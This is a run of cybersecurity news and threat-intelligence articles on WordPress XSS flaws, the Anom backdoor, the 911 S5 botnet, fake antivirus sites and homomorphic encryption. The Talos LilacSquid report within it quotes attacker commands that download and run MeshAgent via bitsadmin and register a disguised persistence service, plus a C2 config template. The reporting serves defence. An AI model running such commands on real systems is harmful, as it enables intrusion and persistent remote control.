Fastly researchers discover unauthenticated stored XSS attacks plaguing WordPress Plugins including WP Meta SEO, and the popular WP…

Fastly researchers discover unauthenticated stored XSS attacks plaguing WordPress Plugins including WP Meta SEO, and the popular WP Statistics and LiteSpeed! Learn how these attacks work, the impact they have, and how to fortify your site with a multi-layered defence.

WordPress, the globally used content management system (CMS) powering millions of websites, is being abused in attacks exploiting unauthenticated stored Cross-Site Scripting (XSS) vulnerabilities, warns cloud security provider Fastly. The company discovered active exploitation attempts targeting three high-severity vulnerabilities in popular WordPress plugins.

According to Fastly’s blog post, attackers are injecting malicious scripts and backdoors into websites to create new admin accounts, inject PHP backdoors in plugin and theme files, and set up tracking scripts to monitor infected targets. The malicious payloads were referenced in five domains and with two additional tracking-based domains previously associated with WordPress plugin exploitation.

Vulnerable plugins include WP Meta SEO, and the popular WP Statistics and LiteSpeed Cache plugins, boasting over 600,000 and 5 million active installations respectively, were found vulnerable to attacks, with malicious payloads injected via URL search parameters and scripts disguised as admin notifications, potentially leading to widespread compromise.

For your information, Unauthenticated Stored XSS is a malicious script, which when injected on a WordPress site allows unauthorized access to sensitive information like cookies and session tokens. 

****Vulnerability Details****

CVE-2023-6961, discovered by CERT PL researcher Krzysztof Zając in April 2024, exposes a vulnerability in the WP Meta SEO plugin, which can be exploited by attackers by sending a payload to a target site, generating a 404 response, and inserting an unsanitized header into the database. 

CVE-2024-2194, discovered by Tim Coen in March 2024, allows unauthenticated attackers to inject web scripts into the WP Statistics plugin versions 14.5 and earlier when a user accesses the injected page. Versions lower than 14.5 remain active on 48% of all websites using the plugin.

CVE-2023-40000, discovered by Patchstack in February 2024, exposes a stored cross-site scripting vulnerability in the LiteSpeed Cache plugin, triggering an XSS vulnerability when an admin accesses a backend page disguised as an admin notification.

WordPress plugins rely on user-generated content, which can be vulnerable to malicious scripts if not properly validated and sanitized. Any exploitation can lead to severe consequences, including session hijacking, data theft, malware distribution, and website defacement.

To safeguard your WordPress site from unauthenticated stored XSS attacks update your core, plugins and themes regularly, prioritize input validation and sanitization, regularly scan your site for vulnerabilities, implement a Web Application Firewall (WAF), and use strong passwords and Multi-Factor Authentication (MFA).

Adam Neel, Threat Detection Engineer at Critical Start commented on the issue and told Hackread.com, _“_These WordPress vulnerabilities allow attackers to steal admin credentials via cross-site scripting (XSS) and WordPress admins have capabilities that you would not want in the hands of an attacker such as removing other users, deleting pages, and being able to see all backend content,_“_ he warned.

_“_This is a wealth of information and power for attackers to have, so website administrators must update the vulnerable plugins. Ensure all WordPress plugins are updated to the latest versions, particularly WP Statistics, WP Meta SEO, and LiteSpeed Cache_,”_ Adam advised.

1.  5 Best CAPTCHA Plugins for WordPress Websites
2.  WordPress Websites Hacked with New Sign1 Malware
3.  WordPress Websites Being Hacked with Balada Malware
4.  FakeUpdates Malware Targets Millions of WordPress Sites
5.  Zero-Day Exploit Threatens 200,000 WordPress Websites

Popular WordPress Plugins Leave Millions Open to Backdoor Attacks

This week on the Lock and Code podcast, we speak with Joseph Cox about the FBI's successful backdoor into the phone startup Anom.

_This week on the Lock and Code podcast…_

This is a story about how the FBI got everything it wanted.

For decades, law enforcement and intelligence agencies across the world have lamented the availability of modern technology that allows suspected criminals to hide their communications from legal scrutiny. This long-standing debate has sometimes spilled into the public view, as it did in 2016, when the FBI demanded that Apple unlock an iPhone used during a terrorist attack in the California city of San Bernardino. Apple pushed back on the FBI’s request, arguing that the company could only retrieve data from the iPhone in question by writing new software with global consequences for security and privacy.

“The only way to get information—at least currently, the only way we know,” said Apple CEO Tim Cook, “would be to write a piece of software that we view as sort of the equivalent of cancer.”

The standoff held the public’s attention for months, until the FBI relied on a third party to crack into the device.

But just a couple of years later, the FBI had obtained an even bigger backdoor into the communication channels of underground crime networks around the world, and they did it almost entirely off the radar.

It all happened with the help of Anom, a budding company behind an allegedly “secure” phone that promised users a bevvy of secretive technological features, like end-to-end encrypted messaging, remote data wiping, secure storage vaults, and even voice scrambling. But, unbeknownst to Anom’s users, the entire company was a front for law enforcement. On Anom phones, every message, every photo, every piece of incriminating evidence, and every order to kill someone, was collected and delivered, in full view, to the FBI.

Today, on the Lock and Code podcast with host David Ruiz, we speak with 404 Media cofounder and investigative reporter Joseph Cox about the wild, true story of Anom. How did it work, was it “legal,” where did the FBI learn to run a tech startup, and why, amidst decades of debate, are some people ignoring the one real-life example of global forces successfully installing a backdoor into a company?

> The public…and law enforcement, as well, \[have\] had to speculate about what a backdoor in a tech product would actually look like. Well, here’s the answer. This is literally what happens when there is a backdoor, and I find it crazy that not more people are paying attention to it.
> 
> Joseph Cox, author, Dark Wire, and 404 Media cofounder

Tune in today to listen to the full conversation.

Cox’s investigation into Anom, presented in his book titled Dark Wire, publishes June 4.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 800 arrests, 40 tons of drugs, and one backdoor, or what a phone startup gave the FBI, with Joseph Cox: Lock and Code S05E12 

The North Korea-linked threat actor known as Andariel has been observed using a new Golang-based backdoor called Dora RAT in its attacks targeting educational institutes, manufacturing firms, and construction businesses in South Korea.
"Keylogger, Infostealer, and proxy tools on top of the backdoor were utilized for the attacks," the AhnLab Security Intelligence Center (ASEC) said in a report

Andariel Hackers Target South Korean Institutes with New Dora RAT Malware

This post will help users find out if their Windows device has been added to the 911 S5 botnet by a malicious VPN application

On May 29, 2024, the US Department of Justice (DOJ) announced it had dismantled what was likely the world’s largest botnet ever. This botnet, called “911 S5,” infected systems at over 19 million IP addresses across more than 190 countries. The main sources of income for the operators, who stole a billions of dollars across a decade, came from committing pandemic and unemployment fraud, and by selling access to child exploitation materials.

The botnet operator generated millions of dollars by offering cybercriminals access to these infected IP addresses. As part of this operation, a Chinese national, YunHe Wang, was arrested. Wang is reportedly the proprietor of the popular service.

Of the infected Windows devices, 613,841 IP addresses were located in the United States. The DOJ also called the botnet a residential proxy service. Residential proxy networks allow someone in control to rent out a residential IP address which then can be used as a relay for their internet communications. This allows them to hide their true location behind the residential proxy. Cybercriminals used this service to engage in cyberattacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.

To set up this botnet, Wang and his associates provided users with free, illegitimate VPN applications that were created to connect to the 911 S5 service. Unaware of the proxy backdoor, once users downloaded and installed these VPN applications, they unknowingly became part of the 911 S5 botnet.

Sometimes the VPN applications were bundled with games and other software and installed without user consent.

For this reason, the FBI has published a public service announcement (PSA) to help users find out if they have been affected by this botnet.

Users can start by going over this list of malicious VPN applications associated with the 911 S5 botnet:

*   MaskVPN
*   DewVPN
*   PaladinVPN
*   ProxyGate
*   ShieldVPN
*   ShineVPN

If you have one of these VPN applications installed, sometimes you can find an uninstaller located under the Start menu option of the VPN application. If present, you can use that uninstall option.

If the application doesn’t present you with an uninstall option, then follow the steps below to attempt to uninstall the application:

*   Click on the Start menu (Windows button) and type “Add or remove programs” to bring up the “Add and Remove Programs” menu.
*   Search for the name of the malicious VPN application.
*   Once you find the application in the list, click on the application name, and select the “Uninstall” option.

Once you have uninstalled the application, you will want to make sure it’s no longer active. To do that, open the Windows Task manager. Press Control+Alt+Delete on the keyboard and select the “Task Manager” option or right-click on the Start menu (Windows button) and select the “Task Manager” option.

In Task Manager look under the “Process” tab for the following processes:

*   MaskVPN (mask\_svc.exe)
*   DewVPN (dew\_svc.exe)
*   PaladinVPN (pldsvc.exe)
*   ProxyGate (proxygate.exe, cloud.exe)
*   ShieldVPN (shieldsvc.exe)
*   ShineVPN (shsvc.exe)

_Example by FBI showing processes associated with ShieldVPN in Task Manager_

If found, select the service related to one of the identified malicious software applications running in the process tab and select the option “End task” to attempt to stop the process from running.

Or, download Malwarebytes Premium (there is a free trial) and run a scan.

Whether you’re using the free or paid version of the app, you can manually run a scan to check for threats on your device. 

1.  Open the app.
2.  On the main dashboard, click the **Scan** button.
3.  A progress page appears while the scan runs.
4.  After the scan finishes, it displays the Threat scan summary.
    *   **If the scan detected no threats:** Click **Done**.
    *   **If the scan detected threats on your device:** Review the threats found on your computer. From here, you can manually quarantine threats by selecting a detection and clicking **Quarantine**.
5.  Click **View Report** or **View Scan Report** to see a history of prior scans. After viewing the threat report, close the scanner window.

If neither of these options, including the Malwarebytes scan, resolve the problem, the FBI has more elaborate instructions. You can also contact the Malwarebytes Support team to assist you.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 How to tell if a VPN app added your Windows device to a botnet 

Multiple TTPs utilized in this campaign bear some overlap with North Korean APT groups.

Thursday, May 30, 2024 08:01

_By Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White._ 

*   Cisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, we attribute to an advanced persistent threat actor (APT) we’re calling “LilacSquid.”  
*   LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources.  
*   This campaign uses MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising vulnerable application servers exposed to the internet.  
*   This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”  
*   The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to attacker-controlled servers. 

**LilacSquid – An espionage-motivated threat actor **

Talos assesses with high confidence that this campaign has been active since at least 2021 and the successful compromise and post-compromise activities are geared toward establishing long-term access for data theft by an advanced persistent threat (APT) actor we are tracking as "LilacSquid" and UAT-4820. Talos has observed at least three successful compromises spanning entities in Asia, Europe and the United States consisting of industry verticals such as pharmaceuticals, oil and gas, and technology. 

Previous intrusions into software manufacturers, such as the 3CX and X\_Trader compromises by Lazarus, indicate that unauthorized long-term access to organizations that manufacture and distribute popular software for enterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to threat actors such as LilacSquid, allowing them to widen their net of targets.  

We have observed two different types of initial access techniques deployed by LilacSquid, including exploiting vulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity in this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop session application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing LilacSquid to gain complete control over the infected systems. Additional means of persistence used by LilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for proxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. 

It is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public reporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after successful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKs proxy and tunneling tools, along with custom-made malware as part of their post-compromise playbooks to act as channels of secondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where the threat actor deployed SSF along with other malware to create tunnels to their remote servers. 

**LilacSquid’s infection chains **

There are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the successful exploitation of a vulnerable web application, while the other is the use of compromised RDP credentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto compromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and PurpleInk. 

Successful exploitation of the vulnerable application results in the attackers deploying a script that will set up working directories for the malware and then download and execute MeshAgent from a remote server. On execution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and activating other implants on the system, such as SSF and PurpleInk. 

MeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish contact with the C2: 

bitsadmin /transfer -job\_name- /download /priority normal -remote\_URL- -local\_path\_for\_MeshAgent-  -local\_path\_for\_MeshAgent- connect 

**Instrumenting InkLoader – Modularizing the infection chain **

When compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid chose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection preceding PurpleInk.  

InkLoader is a simple, yet effective DOT NET-based malware loader. It is written to run a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host instead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but LilacSquid may likely use InkLoader to deploy additional malware implants. 

Talos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully create and maintain remote sessions via remote desktop (RDP) by exploiting the use of stolen credentials to the target host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts into desired directories on disk and the subsequent registration of InkLoader as a service that is then started to deploy InkLoader and, in turn, PurpleInk. The infection chain can be visualized as: 

Service creation and execution on the endpoint is typically done via the command line interface using the commands: 

sc create TransactExDetect displayname=Extended Transaction Detection binPath= \_filepath\_of\_InkLoader\_ start= auto 
sc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts 
sc start TransactExDetect 

**PurpleInk – LilacSquid's bespoke implant **

PurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access trojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family.  

PurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port. This file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. 

PurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos has observed multiple variants of PurpleInk where functionalities have both been introduced and removed. 

In terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: 

*   Enumerate the process and send the process ID, name and associated Window Title to the C2. 
*   Terminate a process ID (PID) specified by the C2 on the infected host. 
*   Run a new application on the host – start process. 
*   Get drive information for the infected host, such as volume labels, root directory names, drive type and drive format. 
*   Enumerate a given directory to obtain underlying directory names, file names and file sizes. 
*   Read a file specified by the C2 and exfiltrate its contents. 
*   Replace or append content to a specified file. 

*   Gather system information about the infected host using WMI queries. Information includes:  

Information retrieved 

WMI query and output used 

Processor name 

SELECT \* FROM Win32\_Processor 

Memory (RAM) size in MB 

Select \* From Win32\_ComputerSystem | TotalPhysicalMemory 

Video Card (GPU) 

SELECT \* FROM Win32\_DisplayConfiguration | Description 

Username 

Current username 

Computer name 

Infected host’s name 

Domain name 

Domain of the infected host 

Host name 

NetBIOS Host name 

System drive 

Root system drive 

System directory 

System directory of the infected host 

Computer uptime 

Calculate uptime from current time and SELECT \* FROM Win32\_OperatingSystem WHERE Primary='true' | LastBootUpTime 

MAC address 

By enumerating Network interfaces on the endpoint 

LAN IP address 

By enumerating Network interfaces on the endpoint 

WAN IP address 

None – not retrieved or calculated – empty string sent to C2. 

Antivirus software name 

Not calculated – defaults to “NoInfo” 

Firewall 

Not calculated – defaults to “NoInfo” 

Time zone 

Not calculated – an empty string is sent to the C2. 

Country 

Not calculated – an empty string is sent to the C2. 

ISP 

Not calculated – an empty string is sent to the C2. 

*   Start a remote shell on the infected host using ‘ cmd\[.\]exe /K ’. 
*   Rename or move directories and files and then enumerate them. 
*   Delete files and directories specified by the C2. 
*   Connect to a specified remote address, specified by the C2. This remote address referenced as “Friend” internally is the reverse proxy host indicating that PurpleInk can act as an intermediate proxy tool. 

PurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): 

*   Connect to a _new_ friend whose remote address is specified by the C2. 
*   Send data to a new or existing friend. 
*   Disconnect from a specified friend. 
*   Receive data from another connected friend and process it. 

Another PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of its capabilities stripped out. The capabilities that still reside in this variant are the abilities to: 

*   Close all connections to proxy servers. 
*   Create a reverse shell.  
*   Connect and send/receive data from connected proxies. 

Functionalities, such as file management, execution and gathering system information, have been stripped out of this variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which can be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together functionalities to reduce their implant’s footprint on the infected system to avoid detection or to improve their implementations to remove redundant capabilities.  

**InkBox – Custom loader observed in older attacks **

InkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The decrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox process. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is: 

The usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the threat actor has produced another variant of the infection chain where they have modularized the infection chain so that PurpleInk can now run as a separate process. However, even in this new infection chain, PurpleInk is still run via another component that we call "InkLoader.”  

**LilacSquid employs MeshAgent **

In this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity. MeshAgent is the agent/client from the MeshCentral, an open-source remote device management software. The MeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign contain information such as MeshName (victim identifier in this case) and C2 addresses: 

MeshName=-Name\_of\_mesh- 
MeshType=-Type\_of\_mesh- 
MeshID=0x-Mesh\_ID\_hex- 
ServerID=-Server\_ID\_hex- 
MeshServer=wss://-Mesh\_C2\_Address-
Translation=-keywords\_translation\_JSON-

Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the device via the MeshCentral server, providing capabilities such as: 

*   List all devices in the Mesh (list of victims). 
*   View and control desktop. 
*   Manage files on the system. 
*   View software and hardware information about the device.  

Post-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF and PurpleInk.  

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

**IOCs**

IOCs for this research can also be found at our GitHub repository here. 

**PurpleInk **

2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 

**Network IOCs **

67\[.\]213\[.\]221\[.\]6 

192\[.\]145\[.\]127\[.\]190 

45\[.\]9\[.\]251\[.\]14 

199\[.\]229\[.\]250\[.\]142

LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader

The US says a Chinese national operated the “911 S5” botnet, which included computers worldwide and was used to file hundreds of thousands of fraudulent Covid claims and distribute CSAM, among other crimes.

The United States Department of Justice on Wednesday announced charges against a 35-year-old Chinese national, Yunhe Wang, accused of operating a massive botnet allegedly linked to billions of dollars in fraud, child exploitation, and bomb threats, among other crimes.

Wang, identified by numerous pseudonyms—Tom Long and Jack Wan, among others—was arrested on May 24 and is accused of distributing malware through various pop-up VPN services, such as “ProxyGate” and “MaskVPN,” and by embedding viruses in internet files distributed via peer-to-peer networks known as torrents.

The malware is said to have compromised computers located in nearly every country in the world, turning them into proxies through which criminals were able to hide their identities while committing countless crimes. According to prosecutors in the US, this included the theft of billions of dollars slated for Covid-19 pandemic relief—funds allegedly stolen by foreign actors posing as unemployed US citizens.

According to an indictment, the infected computers allegedly provided Wang’s customers with a persistent backdoor, allowing them to disguise themselves as any one of the victims of Wang’s malware. This illicit proxy service, known as “911 S5,” launched as early as 2014, the US government says.

“The 911 S5 Botnet infected computers in nearly 200 countries and facilitated a whole host of computer-enabled crimes, including financial frauds, identity theft, and child exploitation,” says FBI director Christopher Wray, who described the illicit service as “likely the world’s largest botnet ever.”

The US Treasury Department has also sanctioned Wang and two other individuals allegedly tied to 911 S5.

Wang is said to have amassed access to nearly 614,000 IP addresses in the US and more than 18 million others worldwide—collectively forming the botnet. 911 S5’s customers were able to filter the IPs geographically to choose where they’d like to appear to be located, down to a specific US zip code, the DOJ claims.

The indictment states that of the 150 dedicated servers used to manage the botnet, as many as 76 were leased by US-based service providers, including the one hosting 911 S5’s client interface, which allowed criminals overseas to purchase goods using stolen credit cards, in many cases for the alleged purpose of circumventing US export laws.

More than half a million fraudulent claims lodged with pandemic relief programs in the United States are allegedly tied to 911 S5. According to the indictment, nearly $6 billion in losses have been linked to IP addresses captured by 911 S5. Many of the IP addresses have been reportedly tied to more insidious crimes, including bomb threats and the trafficking of child sexual abuse material, or CSAM.

“Proxy services like 911 S5 are pervasive threats that shield criminals behind the compromised IP addresses of residential computers worldwide,” says Damien Diggs, the US attorney for the Eastern District of Texas, where the charges against Wang were brought by a grand jury earlier this month.

Adds Nicole Argentieri, head of the Justice Department’s Criminal Division: “These criminals used the hijacked computers to conceal their identities and commit a host of crimes, from fraud to cyberstalking.”

At the time of writing, it is unclear whether these virtual impersonations resulted in any criminal investigations or charges against US-based victims whose IP addresses were hijacked as part of the 911 S5 botnet. WIRED is awaiting a response from the Department of Justice regarding this concern.

According to the Justice Department, law enforcement agencies in Singapore, Thailand, and Germany collaborated with US authorities to effect Wang’s arrest.

Wang faces charges of conspiracy, computer fraud, conspiracy to commit wire fraud, and conspiracy to money laundering, with a maximum penalty of 65 years in prison. The US is also seeking to seize a mountain of luxury cars and goods allegedly owned by Wang, including a 2022 Ferrari Spider valued at roughly half a million dollars as well as a Patek Philippe watch worth potentially several times that amount.

‘Largest Botnet Ever’ Tied to Billions in Stolen Covid-19 Relief Funds

By Deeba Ahmed
Trellix research exposes the dangers of fake antivirus websites disguised as legitimate security software but harbouring malware. Learn…
This is a post from HackRead.com Read the original post: Fake Antivirus Sites Spread Malware Disguised as Avast, Malwarebytes, Bitdefender

Trellix research exposes the dangers of fake antivirus websites disguised as legitimate security software but harbouring malware. Learn how to identify these scams and protect yourself from threats like identity theft and ransomware attacks.

Imagine searching online for an antivirus program to protect your computer, only to stumble upon a website that infects your device with information stealers. This is the deceptive tactic employed by fake antivirus (AV) sites, a growing threat detailed in Trellix’s research titled “A Catalog of Hazardous AV Sites – A Tale of Malware Hosting.”

****Deception Disguised as Security****

In April 2024, Trellix Advanced Research Center team members discovered several fake antivirus sites hosting sophisticated malicious files like APK, EXE, and Inno setup installers. These sites are used to distribute SpyNote trojan, Lumma malware, and StealC malware. The malware hosts include avast-securedownload.com, bitdefender-app.com, and malwarebytes.pro.

****Avast-securedownload.com:****

It hosts a sophisticated APK called Avast.apk that delivers SpyNote Trojan, which can install and delete packages, read call logs, SMS, contacts, storage data, phone state, and more. It also has a recorder, touch activity tracker, and update capabilities.

****Bitdefender-app.com:****

This website delivers a zip file with an EXE named “setup-win-x86-x64.exe.zip” with a discreet TLS callback function. It delivers Lumma malware, targeting sensitive information like PC name, username, HWID, screen resolution, CPU, installed memory, running process, login data, history, cookies, tokens, and user profile information.

****Malwarebytes.pro:****

The website delivers RAR files containing legitimate DLLs, Inno Setup, and StealC infostealing malware. The contents are compressed in gzip and transferred to the attacker’s C2 server. The stolen information includes account tokens, Steam tokens, saved card details, system profiles, Telegram logins, running process names, installed browser lists, and common system information.

****Malicious Binaries****

According to Trellix’s blog post, researchers also discovered a binary called AMCoreDat.exe, which facilitates the deployment of stealer malware. The attacker uses a sophisticated method to obfuscate the payload, stealing victim information, including PC name, username, browsing history, cookies, tokens, etc., and sends it to a C2 server.

Fake Avast, Malwarebytes and Bitdefender sites reported by Trellix

****Possible Dangers****

Unaware users, seeking to safeguard their devices, get easily tricked into downloading malicious software disguised as antivirus programs because these sites appear professional, complete with logos, fake testimonials, and urgency-inducing language about potential threats.

The consequences of falling victim to these scams can be severe, including identity theft, financial loss, sensitive data breaches, ransomware attacks and potentially hefty ransom demands.

Researchers suspect these website addresses are distributed by malicious advertising and SEO poisoning strategies. To mitigate risks, it is recommended to follow security measures like using strong cybersecurity solutions, avoiding pirated software, and verifying software legitimacy with your end-point provider.

1.  Malicious Android Apps Masked as Anti-virus Software
2.  Fake Popular Software Ads Deliver MadMxShell Backdoor
3.  Fake Skype, Zoom, Google Meet Sites Spread Multiple RATs
4.  Hackers steal source code of top anti-virus firms to sell online
5.  Fake LastPass Password Manager App Lurks on iOS App Store

Fake Antivirus Sites Spread Malware Disguised as Avast, Malwarebytes, Bitdefender

By Uzair Amir
Is End-to-End Encryption (E2EE) a Myth? Traditional encryption has vulnerabilities. Fully Homomorphic Encryption (FHE) offers a new hope…
This is a post from HackRead.com Read the original post: How FHE Technology Is Making End-to-End Encryption a Reality

Is End-to-End Encryption (E2EE) a Myth? Traditional encryption has vulnerabilities. Fully Homomorphic Encryption (FHE) offers a new hope for truly secure messaging, cloud storage, and data analysis.

Encryption is like waterproofing: it needs to be all or not at all. Just as it makes no sense to waterproof a left shoe and leave the right unprotected, encrypting the consumer component of a messaging app is pointless if content can later be decrypted on cloud servers.

It’s called end-to-end encryption (E2EE) for a reason, but up until now many services claiming to utilize this technology have fallen woefully short. From an architectural perspective, E2EE is difficult to implement, particularly in applications that serve millions of users.

However, the emergence of a relatively new encryption technology is raising hope that E2EE may become a reality rather than an aspiration. Its name is Fully Homomorphic Encryption (FHE) and its unique design makes it ideally suited to services that are reliant on true end-to-end encryption.

**How End-to-End Encryption Works**

End-to-end encryption is a technology that’s meant to ensure that only users communicating with one another can read the messages. This could be two individuals chatting via a messaging application or it could be a business exchanging payment data with another entity such as a bank. Data is encrypted on the sender’s device and decrypted on the recipient’s device, preventing intermediaries, including service providers, from accessing the content.

This is achieved by using cryptographic keys that encode the message before transmitting it in encrypted form. The counterparty then decodes the message using its own cryptographic key in order to read its content. In addition to messaging apps such as Signal and Telegram, the technology is used by email providers, cloud storage services, and file-sharing platforms. It’s no exaggeration to say that E2EE is the backbone of the internet.

While E2EE can prove very effective at preventing third parties from intercepting messages, it is by no means bulletproof. Concerted attempts by adversaries, ranging from governments to state-sponsored hackers, to weaken encryption and introduce backdoors have resulted in many services that purport to use E2EE being vulnerable.

Critically, from the user’s perspective, there is no easy means of verifying whether encryption has been maintained throughout. As a result, individuals are compelled to take service providers at their word when they promise that messages are fully encrypted.

**How Encrypted Is Fully Encrypted?**

When a service claims to be end-to-end encrypted, it should be just that. In reality, implementations can differ wildly in terms of encryption strength. While it’s theoretically possible for users to check that the service they’re using is implementing robust encryption, it’s technically complex to do so, placing this ability beyond the reach of most users.

Telegram, for instance, allows users to verify that its open-source code is the same as that being used within its mobile applications and on desktop. However, this requires running a series of Terminal commands.

Telegram founder Pavel Durov has previously taken aim at other messaging applications, questioning the integrity of their E2EE. In his personal Telegram channel, he’s claimed: “An alarming number of important people I’ve spoken to remarked that their “private” Signal messages had been exploited against them in US courts or media. But whenever somebody raises doubt about their encryption, Signal’s typical response is “we are open source so anyone can verify that everything is all right”. That, however, is a trick.”

He then elaborates on the inability for users to verify that Signal’s Github code is the same as that running in the app. It should be noted that despite its claims to offer superior encryption, Telegram has also fielded accusations of weaknesses in its own E2EE implementation.

One of the challenges is that even when a service provider has implemented robust encryption, there is still the potential for messages to be deciphered. From weak key management to compromised devices due to malware, there’s a multitude of ways in which content can be accessed by adversaries. And when a key is compromised, unless the provider generates new keys for every session, it’s possible to decrypt the entire messaging history.

Finally, even when E2EE is working optimally, its implementation places additional computational demands on networks, resulting in increased latency and reduced performance, especially on devices with limited processing power or on blockchains where resources are capped. For this reason, E2EE is by no means impregnable. Can FHE solve some of these challenges, or will it run into the same problems that have weakened existing encryption protocols?

****FHE Meets E2EE****

One of the weak points with traditional E2EE is when it comes to decrypting the data: it’s here that there’s potential for a third party to gain access to it. FHE, in comparison, allows computation to be performed directly on encrypted data without decryption, ensuring that data remains protected throughout the entire process. This is its greatest attribute and the one that differentiates it from other encryption technologies.

It may be hard to visualize the benefit FHE brings to bear in this respect when considering a messaging application, in which the data must be decrypted before it can be read by the recipient. But consider another instance in which FHE proves superior at safeguarding data within E2EE systems: email. Here, FHE makes it possible for an email provider or cloud service to return results from an encrypted database without actually seeing the data.

This capability can also be extended to numerous other use cases in which data can be analyzed without disclosing its contents: analysts can run algorithms on encrypted datasets, with the results only decryptable by the intended recipient. Or machine learning models can be trained using encrypted data. This allows organizations to leverage powerful AI tools without compromising the privacy of the underlying data.

Within a blockchain context, fully homomorphic encryption also has significant potential, particularly in the construction of end-to-end encrypted applications for messaging or transmitting financial data. Fhenix, for example, is powered by fhEVM, a variation of the Ethereum Virtual Machine, that supports confidential smart contracts. As a result, confidential data can be analyzed and transmitted without its contents being disclosed.

Given that data remains encrypted at all stages with FHE – in transit, at rest, and during processing – it’s easy to see why developers are so excited about its potential for strengthening E2EE systems.

FHE can reduce the attack surface and ensure that sensitive data is never exposed to unauthorized parties, even during processing. This eliminates the need to trust service providers since they only handle encrypted data and mitigates the risks associated with data breaches. 

If FHE can achieve wider adoption, both in blockchain and traditional systems, end-to-end encryption may soon live up to its name, providing truly unbreakable data protection.

1.  WhatsApp Engineers Fear Encryption Flaw Exposes User Data
2.  8 tips to protect company data sent via home internet connections
